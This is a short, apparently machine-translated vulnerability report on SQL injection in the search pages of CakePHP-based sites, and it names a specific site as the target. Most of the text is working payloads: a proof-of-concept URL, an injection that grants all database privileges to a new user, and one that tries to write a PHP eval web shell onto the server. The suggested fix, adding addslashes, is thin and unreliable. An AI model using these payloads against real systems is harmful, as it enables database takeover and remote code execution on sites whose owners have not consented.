SQL injection attacks and repair solutions exist in search sites of multiple CAKEPHP frameworks such as weitin

Http://www.vcotton.com/searchs? Keywords = % 25% 27% 29 + and + 1% 3D1 + and + 1 + like % 28% 27%
Cakephp most framework versions set up applications without search injection Filtering
1 = 1 can be changed at will.
Then you can
% ') And 1 = 1; grant all privileges on *. * to 'zimengqian' @ '%' identified by '123 ';#
You can
% ') And 1 = (select' <? Php eval ($ _ POST [c])?> 'Into outfile'/data/web_root/abram.intra.vcotton.com/www/current/app/app_controller.php'); # (sadly, you do not have the write permission)
Proof of vulnerability: http://www.vcotton.com/searchs? Keywords = % 25% 27% 29 + and + 1% 3D1 + and + 1 + like % 28% 27%
Http://www.vcotton.com/searchs? Keywords = % 25% 27% 29 + and + 1% 3D2 + and + 1 + like % 28% 27%
Solution: www.2cto.com
 
Add the addslashes in the proper position and use str_replace to add a slash to % and _.
Or modify
Core/libs/controller/components/request_handler.php to adapt to all (maybe 2.0 has modified this bug)
 
Author: Zi mengyu